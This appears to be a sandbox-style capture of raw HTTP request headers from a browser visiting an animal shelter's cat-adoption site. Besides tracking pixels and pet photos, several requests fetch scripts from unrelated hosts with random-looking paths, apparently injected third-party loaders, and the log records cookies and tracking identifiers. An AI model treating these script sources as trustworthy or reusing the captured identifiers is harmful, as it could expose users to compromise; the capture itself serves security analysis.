image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=SubscribedButtonClick&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387961162&cd[buttonFeatures]=%7B%22classList%22%3A%22tcb-button-text%20thrv-inline-text%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22I%20want%20a%20cat!%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22span%22%2C%22type%22%3Anull%7D&cd[buttonText]=I%20want%20a%20cat!&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22IndyHumane%20-%20IndyHumane%22%7D&sw=1280&sh=1024&udff[st]=b5252c3a46889dfab36f8b107b182bce34c7d892ad371e2c62980177440843eb&udff[em]=044ca09b8400e82db8fb1ae54f2bdb31e7639d757f7e5bde0ecd8fe086f18ad2&v=2.9.179&r=stable&ec=1&o=6174&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&es=automatic&tm=3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /X3jCvSRaodQ7WviPaUvunywMp819QuDRPham1DEfnds2FKefc1qwn2VauM4tWr8= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adopt/adoptable-cats/ HTTP/1.1Host: indyhumane.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1223850198.1736387954; _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1; _ga_CDQ7BLPKF7=GS1.1.1736387952.1.0.1736387955.0.0.0; _ga_VFFY2PDZ27=GS1.1.1736387955.1.0.1736387955.60.0.0; _ga=GA1.2.932040568.1736387953; _gid=GA1.2.1054392251.1736387956; _dc_gtm_UA-57291413-5=1; _fbp=fb.1.1736387957086.7343460081337104; _gat_UA-57291413-5=1; _ga_RSYQJ6KTLL=GS1.2.1736387958.1.0.1736387961.57.0.0
Source: global trafficHTTP traffic detected: GET /tr/?id=1174527456525563&ev=SubscribedButtonClick&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387961160&cd[buttonFeatures]=%7B%22classList%22%3A%22tcb-button-text%20thrv-inline-text%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22I%20want%20a%20cat!%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22span%22%2C%22type%22%3Anull%7D&cd[buttonText]=I%20want%20a%20cat!&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22IndyHumane%20-%20IndyHumane%22%7D&sw=1280&sh=1024&udff[st]=b5252c3a46889dfab36f8b107b182bce34c7d892ad371e2c62980177440843eb&udff[em]=044ca09b8400e82db8fb1ae54f2bdb31e7639d757f7e5bde0ecd8fe086f18ad2&v=2.9.179&r=stable&ec=1&o=6174&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&es=automatic&tm=3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1401480206566122&ev=SubscribedButtonClick&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387961162&cd[buttonFeatures]=%7B%22classList%22%3A%22tcb-button-text%20thrv-inline-text%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22I%20want%20a%20cat!%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22span%22%2C%22type%22%3Anull%7D&cd[buttonText]=I%20want%20a%20cat!&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22IndyHumane%20-%20IndyHumane%22%7D&sw=1280&sh=1024&udff[st]=b5252c3a46889dfab36f8b107b182bce34c7d892ad371e2c62980177440843eb&udff[em]=044ca09b8400e82db8fb1ae54f2bdb31e7639d757f7e5bde0ecd8fe086f18ad2&v=2.9.179&r=stable&ec=1&o=6174&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&es=automatic&tm=3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=SubscribedButtonClick&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387961160&cd[buttonFeatures]=%7B%22classList%22%3A%22tcb-button-text%20thrv-inline-text%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22I%20want%20a%20cat!%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22span%22%2C%22type%22%3Anull%7D&cd[buttonText]=I%20want%20a%20cat!&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22IndyHumane%20-%20IndyHumane%22%7D&sw=1280&sh=1024&udff[st]=b5252c3a46889dfab36f8b107b182bce34c7d892ad371e2c62980177440843eb&udff[em]=044ca09b8400e82db8fb1ae54f2bdb31e7639d757f7e5bde0ecd8fe086f18ad2&v=2.9.179&r=stable&ec=1&o=6174&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&es=automatic&tm=3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=SubscribedButtonClick&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387961162&cd[buttonFeatures]=%7B%22classList%22%3A%22tcb-button-text%20thrv-inline-text%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22I%20want%20a%20cat!%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22span%22%2C%22type%22%3Anull%7D&cd[buttonText]=I%20want%20a%20cat!&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22IndyHumane%20-%20IndyHumane%22%7D&sw=1280&sh=1024&udff[st]=b5252c3a46889dfab36f8b107b182bce34c7d892ad371e2c62980177440843eb&udff[em]=044ca09b8400e82db8fb1ae54f2bdb31e7639d757f7e5bde0ecd8fe086f18ad2&v=2.9.179&r=stable&ec=1&o=6174&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&es=automatic&tm=3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adopt/adoptablesearch/images/PetPlaceLogo.png HTTP/1.1Host: indyhumane.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/adopt/adoptable-cats/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1223850198.1736387954; _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1; _ga=GA1.2.932040568.1736387953; _gid=GA1.2.1054392251.1736387956; _dc_gtm_UA-57291413-5=1; _fbp=fb.1.1736387957086.7343460081337104; _gat_UA-57291413-5=1; _ga_RSYQJ6KTLL=GS1.2.1736387958.1.0.1736387961.57.0.0; _ga_CDQ7BLPKF7=GS1.1.1736387952.1.0.1736387962.0.0.0; _ga_VFFY2PDZ27=GS1.1.1736387955.1.0.1736387962.53.0.0
Source: global trafficHTTP traffic detected: GET /photos/352/5b32b2a8-d2d1-4503-a972-110fb5733d74.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/39f4fd8f-1529-42bf-86fc-7f36c7c27f03.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/664b40dc-dc4d-442f-9566-be74b80b557a.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/chat.js HTTP/1.1Host: cdn.customgpt.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "01d69629e7e8550c81ca7654836e6f00"If-Modified-Since: Thu, 02 Jan 2025 13:47:19 GMT
Source: global trafficHTTP traffic detected: GET /SR0ymlWkoOcyiZuXCrFr3HWgupYiPaMXa-GLcDabjeW HTTP/1.1Host: leatherbook.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/ecdfe4a2-be11-4f87-81a3-6e76acef32e3.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/58fb90fa-3f7f-4604-b405-4824f93f36bd.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/a0e8fe39-b7b2-4f7f-a7b1-afe0c240e5ef.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387962834&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&c8=Adoptable%20Cats%20-%20IndyHumane&c9=https%3A%2F%2Findyhumane.org%2F HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=1287479d2ea4f533b1a92731736387955; XID=1287479d2ea4f533b1a92731736387955
Source: global trafficHTTP traffic detected: GET /photos/352/fdac7120-64a7-4244-8d9a-cd8706ac5427.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/9f9246f1-3d7b-48bd-a446-e54427acddec.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/5b32b2a8-d2d1-4503-a972-110fb5733d74.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/39f4fd8f-1529-42bf-86fc-7f36c7c27f03.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/Photo-Not-Available-cat.gif HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/664b40dc-dc4d-442f-9566-be74b80b557a.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/86630945-fa46-44bc-bf53-730648f81adc.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/a0e8fe39-b7b2-4f7f-a7b1-afe0c240e5ef.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/58fb90fa-3f7f-4604-b405-4824f93f36bd.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/d48e2ad2-00c5-4dee-acb5-efe4acd00f0a.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/chat.js HTTP/1.1Host: cdn.customgpt.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "01d69629e7e8550c81ca7654836e6f00"If-Modified-Since: Thu, 02 Jan 2025 13:47:19 GMT
Source: global trafficHTTP traffic detected: GET /signals/config/1401480206566122?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/45e9cc7f-8a67-4e62-aa35-92ae279c9453.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/ecdfe4a2-be11-4f87-81a3-6e76acef32e3.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
